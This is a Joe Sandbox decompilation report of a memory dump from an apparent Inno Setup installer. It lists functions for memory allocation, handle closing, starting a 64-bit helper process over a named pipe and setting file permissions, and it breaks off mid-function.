0x00448991
0x0044899f
0x004489af
0x004489bf
0x004489c4
0x004489c7
0x004489c9
0x004489c9
0x004489c9
0x004489d6
0x004489e3
0x004489e3
0x004489e6
0x004489e8
0x004489e8
0x004489e9
0x004489ee
0x004489f3
0x004489f3
0x004489f3
0x004489e9
0x004489fe
0x00448a00
0x00448a03
0x00448a05
0x00448a09
0x00448a11
0x00448a28
0x00448a2d
0x00448a2e
0x00448a2f
0x00448a2f
0x00448a05
0x00448a37
0x00448a3a
0x00448a51
0x00448a53
0x00448a3c
0x00448a4c
0x00448a4c
0x00448a58
0x00448a59
0x00448a5e
0x00448a61
0x00448a7b
0x00448a8a
0x00448a8f
0x00448a91
0x00448a94
0x00448a97
0x00448a9f
0x00448aac
0x00448993
0x00000000
0x00448993
0x0044892a
0x00448930
0x00448935
0x00448937
0x00000000
0x00448939
0x00000000
0x00448939
0x00448937
0x0044891a
0x00448ab6
0x00448ab8
0x00448abb
0x00448abe
0x00448acb
0x00448acb

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 273739b0c0974acd627b1b42af382234852b02eac3c278118f5354121f24a6e2
Instruction ID: cb5bc6dcd76587afdfecd2b16fac5137301e2ec7d3732cbacc5f6042d23f8f03
Opcode Fuzzy Hash: 273739b0c0974acd627b1b42af382234852b02eac3c278118f5354121f24a6e2
Instruction Fuzzy Hash: 5A515370A041099FEB00EFA9C892AAFBBF5EB48314F10417FE504A7391DB789D45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401680 Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401680(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x48d440; // 0x60241c
				while(_t29 != 0x48d440) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x00401687
0x0040168b
0x00401692
0x004016a7
0x004016af
0x004016b5
0x004016bb
0x004016be
0x00401702
0x004016c6
0x004016cc
0x004016d0
0x004016d2
0x004016d2
0x004016d8
0x004016da
0x004016da
0x004016e0
0x004016ed
0x004016f4
0x004016f6
0x004016fc
0x00000000
0x004016fc
0x004016f4
0x00401700
0x00401700
0x00401711

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004016ED

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 623ec00aa2380b766de036dbdfdd6f0b09fa57e2f21e8112d72e2660bd701401
Instruction ID: 8e25b90ae9f864962d718719b52cc57e6420d8e0f8478eb6e4e12427a5fbc1b4
Opcode Fuzzy Hash: 623ec00aa2380b766de036dbdfdd6f0b09fa57e2f21e8112d72e2660bd701401
Instruction Fuzzy Hash: 76117CB2A057059FC3109F29CC80A2BB7E2EBC4765F15C93DE598AB3A5D635AC408789

Uniqueness

Uniqueness Score: -1.00%

Function 0041F5DC Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F5DC(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x48d650 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x48d64c; // 0x2040000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E00402740(0x48c598, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041F5D4(_t2, E0041F5B4);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041F5D4(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x48d650;
						 *0x48d650 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x48d64c = _t35;
				}
				_t25 =  *0x48d650;
				_t8 = _t25 + 5; // 0xe4004107
				 *0x48d650 =  *_t8;
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x48d650;
			}

0x0041f5ea
0x0041f5fa
0x0041f5ff
0x0041f601
0x0041f606
0x0041f608
0x0041f615
0x0041f61f
0x0041f627
0x0041f62a
0x0041f62a
0x0041f62d
0x0041f62d
0x0041f630
0x0041f63a
0x0041f63f
0x0041f642
0x0041f644
0x0041f64b
0x0041f652
0x0041f652
0x0041f65a
0x0041f65c
0x0041f65f
0x0041f664
0x0041f66a
0x0041f671

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EFBC,?,00423AA7,00423E24,0041EFBC), ref: 0041F5FA

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3bf2275e5bdd391133c41da861ed914d8cd920a5637d055bac152f1a02e97f48
Instruction ID: ffb70f15c23c369ebd22147956d7b3f3298316e5b4c5cb1a89c484f733871ec0
Opcode Fuzzy Hash: 3bf2275e5bdd391133c41da861ed914d8cd920a5637d055bac152f1a02e97f48
Instruction Fuzzy Hash: 11115E746413099BCB10DF19C880B86FBE5EF98350F10C53AE9589B395D374E849CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401714 Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00401714(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x48d440; // 0x60241c
				while(_t19 != 0x48d440) {
					_t9 =  *(_t19 + 8);
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x48d41c = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}

0x00401718
0x00401729
0x00401730
0x00401739
0x0040173d
0x00401740
0x00401743
0x00401783
0x0040174b
0x00401751
0x00401756
0x00401758
0x00401758
0x0040175d
0x0040175f
0x0040175f
0x00401763
0x0040176e
0x00401775
0x00401777
0x00401777
0x00401775
0x00401781
0x00401781
0x00401790

APIs

VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,0040197B), ref: 0040176E

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: b87ec69a82047565488b436492ac0a5e2e4a3ca1825bad6867eb9f30230477ea
Instruction ID: 513dc5185c5ea873f64aca2166fc8996875178c568a1f6713369453d53051677
Opcode Fuzzy Hash: b87ec69a82047565488b436492ac0a5e2e4a3ca1825bad6867eb9f30230477ea
Instruction Fuzzy Hash: 9401F776A452144FC310AE28DCC0E2A77A5DB84724F15453DEE84A7391D33A6C0687A8

Uniqueness

Uniqueness Score: -1.00%

Function 00401348 Relevance: 1.3, APIs: 1, Instructions: 34
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401348() {
				intOrPtr* _t4;
				void* _t5;
				void _t6;
				intOrPtr* _t9;
				void* _t12;
				void* _t14;

				if( *0x48d43c != 0) {
					L5:
					_t4 =  *0x48d43c;
					 *0x48d43c =  *_t4;
					return _t4;
				} else {
					_t5 = LocalAlloc(0, 0x644); // executed
					_t12 = _t5;
					if(_t12 != 0) {
						_t6 =  *0x48d438; // 0x601de8
						 *_t12 = _t6;
						 *0x48d438 = _t12;
						_t14 = 0;
						do {
							_t2 = (_t14 + _t14) * 8; // 0x4
							_t9 = _t12 + _t2 + 4;
							 *_t9 =  *0x48d43c;
							 *0x48d43c = _t9;
							_t14 = _t14 + 1;
						} while (_t14 != 0x64);
						goto L5;
					} else {
						return 0;
					}
				}
			}

0x00401352
0x0040138e
0x0040138e
0x00401392
0x00401396
0x00401354
0x0040135b
0x00401360
0x00401364
0x0040136b
0x00401370
0x00401372
0x00401378
0x0040137a
0x0040137e
0x0040137e
0x00401384
0x00401386
0x00401388
0x00401389
0x00000000
0x00401366
0x0040136a
0x0040136a
0x00401364

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,0048D450,004013AB,?,?,0040144B,?,?,?,00000000,00004003,0040198B), ref: 0040135B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 1d650451abf4cd94ca60064950ad9205ba10338d186e2b1af8347f667f82e992
Instruction ID: 7ff4a81dc3beee52dd7b965dabf485e3e3a5af28703a101092fc3e7724c283ff
Opcode Fuzzy Hash: 1d650451abf4cd94ca60064950ad9205ba10338d186e2b1af8347f667f82e992
Instruction Fuzzy Hash: 9EF08C71B022018FE728DF2DD880B6AB7E1EB99725F20847EE984D77A0D3359C418B54

Uniqueness

Uniqueness Score: -1.00%

Function 0045A3D4 Relevance: 1.3, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045A3D4(void* __eax) {
				void* _t8;
				void* _t11;

				_t11 = __eax;
				 *((intOrPtr*)(__eax + 0x18)) = 0;
				 *((intOrPtr*)(__eax + 0x20)) = 0;
				_t8 =  *(__eax + 0x1c);
				if(_t8 != 0) {
					VirtualFree(_t8, 0, 0x8000); // executed
					 *((intOrPtr*)(_t11 + 0x1c)) = 0;
					return 0;
				}
				return _t8;
			}

0x0045a3d5
0x0045a3d9
0x0045a3de
0x0045a3e1
0x0045a3e6
0x0045a3f0
0x0045a3f7
0x00000000
0x0045a3f7
0x0045a3fb

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,0045A511), ref: 0045A3F0

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: cce0741eba915283d1af970791fc6fd4a3b2d6a50b941ca6d54fc4863a311bf2
Instruction ID: 4bb1b19524ee497d936d9a203229da281160d662b3a3f515f5c05646672da0e1
Opcode Fuzzy Hash: cce0741eba915283d1af970791fc6fd4a3b2d6a50b941ca6d54fc4863a311bf2
Instruction Fuzzy Hash: 36D09EB17103005FDB94CF794CC170726D4BB08601B114576AD08DB286E678D4108B54

Uniqueness

Uniqueness Score: -1.00%

Function 00406FE4 Relevance: 1.3, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406FE4(void* __eax) {
				int _t2;

				_t2 = CloseHandle(__eax); // executed
				return _t2;
			}

0x00406fe5
0x00406fea

APIs

CloseHandle.KERNEL32 ref: 00406FE5

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f7f0ecdfafae218c53e6801bed19de1c9dc055d98d965b2acd2c5b639cdd6ac7
Instruction ID: f91bbd6786645de71ad529a75f1249e0221a6909fe05d9e6353a8ece16ee0238
Opcode Fuzzy Hash: f7f0ecdfafae218c53e6801bed19de1c9dc055d98d965b2acd2c5b639cdd6ac7
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00455B2C Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 184
pipetimeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00455B2C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v12;
				char _v16;
				void* _v20;
				void* _v24;
				long _v28;
				char _v96;
				char _v104;
				void* _v108;
				char _v112;
				char _v116;
				long _v120;
				char _v124;
				long _v128;
				char _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				void* _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				void* _t69;
				intOrPtr _t88;
				int _t89;
				long _t107;
				intOrPtr _t126;
				struct _FILETIME* _t128;
				void* _t132;
				void* _t133;
				intOrPtr _t134;

				_t132 = _t133;
				_t134 = _t133 + 0xffffff4c;
				_v156 = 0;
				_v160 = 0;
				_v16 = 0;
				_t128 =  &_v12;
				_push(_t132);
				_push(0x455e2b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t134;
				E00455814("Starting 64-bit helper process.", 0x48df1c, _t128, 0x48df18);
				_t136 =  *0x4ae250;
				if( *0x4ae250 == 0) {
					E00451AFC("Cannot utilize 64-bit features on this version of Windows", 0x48df1c, _t128, 0x48df18, _t136);
				}
				_t137 =  *0x48df08;
				if( *0x48df08 == 0) {
					E00451AFC("64-bit helper EXE wasn\'t extracted", 0x48df1c, _t128, 0x48df18, _t137);
				}
				while(1) {
					 *0x48df1c =  *0x48df1c + 1;
					 *0x48df18 = GetTickCount();
					if(QueryPerformanceCounter(_t128) == 0) {
						GetSystemTimeAsFileTime(_t128);
					}
					_v152 = GetCurrentProcessId();
					_v148 = 0;
					_v144 =  *0x48df1c;
					_v140 = 0;
					_v136 =  *0x48df18;
					_v132 = 0;
					_v128 = _t128->dwHighDateTime;
					_v124 = 0;
					_v120 = _t128->dwLowDateTime;
					_v116 = 0;
					E00407B08("\\\\.\\pipe\\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x", 4,  &_v152,  &_v16);
					_v20 = CreateNamedPipeA(E00403880(_v16), 0x80003, 6, 1, 0x2000, 0x2000, 0, 0);
					if(_v20 != 0xffffffff) {
						break;
					}
					_t107 = GetLastError();
					_t140 = _t107 - 0xe7;
					if(_t107 != 0xe7) {
						E00451B58("CreateNamedPipe", 0x48df1c, 4, _t128, 0x48df18, _t140);
					}
				}
				_push(_t132);
				_push(0x455de7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t134;
				_push(0);
				_push(0);
				_push(3);
				_push( &E0048CA54);
				_push(0);
				_push(0xc0000000);
				_t69 = E00403880(_v16);
				_push(_t69);
				L00405964();
				_v24 = _t69;
				__eflags = _v24 - 0xffffffff;
				if(__eflags == 0) {
					E00451B58("CreateFile", 0x48df1c, 4, _t128, 0x48df18, __eflags);
				}
				_push(_t132);
				_push(0x455dd6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t134;
				_v28 = 2;
				__eflags = SetNamedPipeHandleState(_v24,  &_v28, 0, 0);
				if(__eflags == 0) {
					E00451B58("SetNamedPipeHandleState", 0x48df1c, 4, _t128, 0x48df18, __eflags);
				}
				E00402A64( &_v96, 0x44);
				_v96 = 0x44;
				_push( &_v112);
				_push( &_v96);
				E0042D8E0( &_v156);
				_push(E00403880(_v156));
				_push(0);
				_push(0xc000000);
				_push(1);
				_push(0);
				_push(0);
				_v176 = 0x67;
				_v172 = 0;
				_v168 = _v24;
				_v164 = 0;
				E00407B08("helper %d 0x%x", 1,  &_v176,  &_v160);
				_push(E00403880(_v160));
				_t88 =  *0x48df08; // 0x21fdca8
				_t89 = E00403880(_t88);
				_push(_t89);
				L0040597C();
				__eflags = _t89;
				if(__eflags == 0) {
					E00451B58("CreateProcess", 0x48df1c, 1, _t128, 0x48df18, __eflags);
				}
				 *0x48df0c = 1;
				 *0x48df0d = 0;
				 *0x48df10 = _v112;
				 *0x48df14 = _v20;
				_v20 = 0;
				CloseHandle(_v108);
				_v184 = _v104;
				_v180 = 0;
				E00455A04("Helper process PID: %u", 0x48df1c, 0,  &_v184, _t128, 0x48df18);
				__eflags = 0;
				_pop(_t126);
				 *[fs:eax] = _t126;
				_push(E00455DDD);
				return CloseHandle(_v24);
			}

0x00455b2d
0x00455b2f
0x00455b3a
0x00455b40
0x00455b46
0x00455b53
0x00455b58
0x00455b59
0x00455b5e
0x00455b61
0x00455b69
0x00455b6e
0x00455b75
0x00455b7c
0x00455b7c
0x00455b81
0x00455b88
0x00455b8f
0x00455b8f
0x00455b94
0x00455b94
0x00455b9b
0x00455ba5
0x00455ba8
0x00455ba8
0x00455bb6
0x00455bbc
0x00455bc5
0x00455bcb
0x00455bd4
0x00455bda
0x00455be1
0x00455be4
0x00455bea
0x00455bed
0x00455c01
0x00455c2b
0x00455c32
0x00000000
0x00000000
0x00455c34
0x00455c39
0x00455c3e
0x00455c49
0x00455c49
0x00455c3e
0x00455c55
0x00455c56
0x00455c5b
0x00455c5e
0x00455c61
0x00455c63
0x00455c65
0x00455c67
0x00455c6c
0x00455c6e
0x00455c76
0x00455c7b
0x00455c7c
0x00455c81
0x00455c84
0x00455c88
0x00455c8f
0x00455c8f
0x00455c96
0x00455c97
0x00455c9c
0x00455c9f
0x00455ca2
0x00455cba
0x00455cbc
0x00455cc3
0x00455cc3
0x00455cd2
0x00455cd7
0x00455ce1
0x00455ce5
0x00455cec
0x00455cfc
0x00455cfd
0x00455cff
0x00455d04
0x00455d06
0x00455d08
0x00455d11
0x00455d1b
0x00455d25
0x00455d2b
0x00455d42
0x00455d52
0x00455d53
0x00455d58
0x00455d5d
0x00455d5e
0x00455d63
0x00455d65
0x00455d6c
0x00455d6c
0x00455d71
0x00455d78
0x00455d82
0x00455d8a
0x00455d91
0x00455d98
0x00455da0
0x00455da6
0x00455dba
0x00455dbf
0x00455dc1
0x00455dc4
0x00455dc7
0x00455dd5

APIs

Part of subcall function 00455814: GetLocalTime.KERNEL32(?,00000000,0045599B,?,?,0048DF10,00000000), ref: 00455844

GetTickCount.KERNEL32 ref: 00455B96
QueryPerformanceCounter.KERNEL32(00000000,00000000,00455E2B,?,?,00000000,00000000,?,004563BE,?,00000000,00000000), ref: 00455B9E
GetSystemTimeAsFileTime.KERNEL32(00000000,00000000), ref: 00455BA8
GetCurrentProcessId.KERNEL32(?,00000000,00000000,00455E2B,?,?,00000000,00000000,?,004563BE,?,00000000,00000000), ref: 00455BB1
CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00455C26
GetLastError.KERNEL32(00000000,00080003,00000006,00000001,00002000,00002000,00000000,00000000,?,00000000,00000000), ref: 00455C34
6D2B5CA0.KERNEL32(00000000,C0000000,00000000,0048CA54,00000003,00000000,00000000,00000000,00455DE7), ref: 00455C7C
SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00455DD6,?,00000000,C0000000,00000000,0048CA54,00000003,00000000,00000000,00000000,00455DE7), ref: 00455CB5

Part of subcall function 0042D8E0: GetSystemDirectoryA.KERNEL32 ref: 0042D8F3

6D747180.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00455D5E
CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00455D98
CloseHandle.KERNEL32(000000FF,00455DDD,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00455DD0

Part of subcall function 00451B58: GetLastError.KERNEL32(00000000,00451BF0,?,?,00000000,00000000,00000005,00000000,00452636,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451B7C

Strings

Cannot utilize 64-bit features on this version of Windows, xrefs: 00455B77
SetNamedPipeHandleState, xrefs: 00455CBE
64-bit helper EXE wasn't extracted, xrefs: 00455B8A
Helper process PID: %u, xrefs: 00455DB5
D, xrefs: 00455CD7
CreateProcess, xrefs: 00455D67
CreateFile, xrefs: 00455C8A
Starting 64-bit helper process., xrefs: 00455B64
helper %d 0x%x, xrefs: 00455D3D
CreateNamedPipe, xrefs: 00455C44
g, xrefs: 00455D11
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x, xrefs: 00455BFC

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: HandleTime$CloseErrorLastNamedPipeSystem$CountCounterCreateCurrentD747180DirectoryFileLocalPerformanceProcessQueryStateTick
String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$g$helper %d 0x%x
API String ID: 3159916666-1343189204
Opcode ID: 25b09b112f54d628eca5e6c6bf70c9bcbadf6f339a0a21d620269fce3c692ddd
Instruction ID: d532dc7a44babe65951fa346a39619af0727fa951ad95cf64c9e66408bb6ffd6
Opcode Fuzzy Hash: 25b09b112f54d628eca5e6c6bf70c9bcbadf6f339a0a21d620269fce3c692ddd
Instruction Fuzzy Hash: E4716370E007449EDB11EB65CC56B9E77B8EB09304F1045AAFA04FB2C2D7786948CF69

Uniqueness

Uniqueness Score: -1.00%

Function 004593E4 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 165
memoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E004593E4(intOrPtr __eax, struct _SID_IDENTIFIER_AUTHORITY* __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v13;
				struct HINSTANCE__* _v20;
				struct HINSTANCE__* _v24;
				char _v28;
				char _v32;
				void* _v36;
				signed int _v40;
				void* _v44;
				void* __edi;
				struct HINSTANCE__* _t61;
				void* _t68;
				void* _t76;
				void* _t82;
				signed int _t95;
				struct HINSTANCE__* _t99;
				signed int _t100;
				intOrPtr _t111;
				struct HINSTANCE__* _t120;
				void* _t122;
				void* _t123;
				struct _SID_IDENTIFIER_AUTHORITY* _t125;
				void* _t128;
				void* _t130;
				intOrPtr _t131;

				_t128 = _t130;
				_t131 = _t130 + 0xffffffd8;
				_t125 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v13 = 0;
				if( *0x48c0e0 != 2 || (GetVersion() & 0x000000ff) < 5) {
					L16:
					return _v13;
				} else {
					_t61 = GetModuleHandleA("advapi32.dll");
					_t120 = _t61;
					_push("GetNamedSecurityInfoA");
					_push(_t120);
					L00405AA4();
					_t99 = _t61;
					_push("SetNamedSecurityInfoA");
					_push(_t120);
					L00405AA4();
					_v20 = _t61;
					_push("SetEntriesInAclW");
					_push(_t120);
					L00405AA4();
					_v24 = _t61;
					if(_t99 == 0 || _v20 == 0 || _v24 == 0) {
						goto L16;
					} else {
						_v40 = 0;
						_t68 = _t99->i(E00403880(_v12), _v8, 4, 0, 0,  &_v32, 0,  &_v28);
						_t138 = _t68;
						if(_t68 != 0) {
							goto L16;
						} else {
							_push(_t128);
							_push(0x4595fe);
							_push( *[fs:edx]);
							 *[fs:edx] = _t131;
							_v40 = E00406A40(_a8 << 5, 0, _t120, _t138);
							_t122 = _a8 - 1;
							if(_t122 < 0) {
								L11:
								_t76 = _v24(_a8, _v40, _v32,  &_v36);
								__eflags = _t76;
								if(_t76 == 0) {
									 *[fs:eax] = _t131;
									_t82 = _v20(E00403880(_v12), _v8, 4, 0, 0, _v36, 0,  *[fs:eax], 0x4595a5, _t128);
									__eflags = _t82;
									if(_t82 == 0) {
										__eflags = 0;
										_pop(_t111);
										 *[fs:eax] = _t111;
										_push(0x4595ac);
										return LocalFree(_v36);
									} else {
										E00403304();
										E00403304();
										goto L16;
									}
								} else {
									E00403304();
									goto L16;
								}
							} else {
								_t123 = _t122 + 1;
								_t100 = 0;
								while(AllocateAndInitializeSid(_t125,  *(_t125 + 6),  *(_t125 + 8),  *(_t125 + 0xc), 0, 0, 0, 0, 0, 0,  &_v44) != 0) {
									_t95 = _t100 << 2;
									 *((intOrPtr*)(_v40 + _t95 * 8)) =  *((intOrPtr*)(_t125 + 0x10));
									 *((intOrPtr*)(_v40 + 4 + _t95 * 8)) = 1;
									 *((intOrPtr*)(_v40 + 8 + _t95 * 8)) = _a4;
									 *((intOrPtr*)(_v40 + 0x14 + _t95 * 8)) = 0;
									 *((intOrPtr*)(_v40 + 0x18 + _t95 * 8)) = 0;
